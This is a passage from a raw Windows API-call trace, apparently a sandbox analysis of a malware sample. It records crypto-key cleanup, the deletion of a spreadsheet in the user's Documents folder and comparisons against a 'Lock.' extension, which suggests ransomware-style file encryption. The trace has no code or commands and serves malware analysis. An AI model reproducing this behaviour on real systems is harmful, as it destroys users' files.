(in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.851] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.851] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.851] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.851] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.852] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab7e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0220.852] CryptDestroyKey (hKey=0x9e2078) returned 1 [0220.852] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.852] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.852] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.852] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.852] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.852] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.852] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.852] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.852] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.852] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.852] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.852] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.852] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.852] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.852] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.852] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.852] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.853] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.853] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.853] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.853] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.853] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.853] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.853] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.854] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.854] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.854] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.854] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.854] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.854] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.854] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.854] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0220.854] CryptReleaseContext (hProv=0xa7c440, dwFlags=0x0) returned 1 [0220.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.854] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.854] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.855] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.855] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.855] FreeLibrary (hLibModule=0x76390000) returned 1 [0220.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.855] CloseHandle (hObject=0x510) returned 1 [0220.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.856] CloseHandle (hObject=0x524) returned 1 [0220.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.858] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.858] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.858] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.858] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/tMLcqE8DzcE8ZL.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\tMLcqE8DzcE8ZL.xlsx", lpFilePart=0x8cedf4*="tMLcqE8DzcE8ZL.xlsx") returned 0x2d [0220.858] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\tMLcqE8DzcE8ZL.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\tmlcqe8dzce8zl.xlsx")) returned 0x20 [0220.859] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\tMLcqE8DzcE8ZL.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22b9b4e0, ftCreationTime.dwHighDateTime=0x1d58feb, ftLastAccessTime.dwLowDateTime=0x63d44870, ftLastAccessTime.dwHighDateTime=0x1d5697e, ftLastWriteTime.dwLowDateTime=0x63d44870, ftLastWriteTime.dwHighDateTime=0x1d5697e, nFileSizeHigh=0x0, nFileSizeLow=0x4e15, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="tMLcqE8DzcE8ZL.xlsx", cAlternateFileName="TMLCQE~1.XLS")) returned 0x9e1eb8 [0220.859] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\tMLcqE8DzcE8ZL.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\tmlcqe8dzce8zl.xlsx")) returned 1 [0220.871] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22b9b4e0, ftCreationTime.dwHighDateTime=0x1d58feb, ftLastAccessTime.dwLowDateTime=0x63d44870, ftLastAccessTime.dwHighDateTime=0x1d5697e, ftLastWriteTime.dwLowDateTime=0x63d44870, ftLastWriteTime.dwHighDateTime=0x1d5697e, nFileSizeHigh=0x0, nFileSizeLow=0x4e15, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="tMLcqE8DzcE8ZL.xlsx", cAlternateFileName="TMLCQE~1.XLS")) returned 0 [0220.871] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0220.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38543f8 | out: hHeap=0x2af0000) returned 1 [0220.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0220.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.872] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0220.872] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0220.872] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0220.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0220.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0220.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0220.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38544e8 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0220.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0220.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a74b88 [0220.874] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/tMLcqE8DzcE8ZL.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\tMLcqE8DzcE8ZL.xlsx", lpFilePart=0x8cf650*="tMLcqE8DzcE8ZL.xlsx") returned 0x2d [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b88 | out: hHeap=0x2af0000) returned 1 [0220.874] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\tMLcqE8DzcE8ZL.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\tmlcqe8dzce8zl.xlsx")) returned 0xffffffff [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38544e8 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.874] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0220.874] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.874] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0220.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0220.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0220.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0220.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0220.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0220.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uhe R_MajVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="he R_MajVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e R_MajVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" R_MajVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 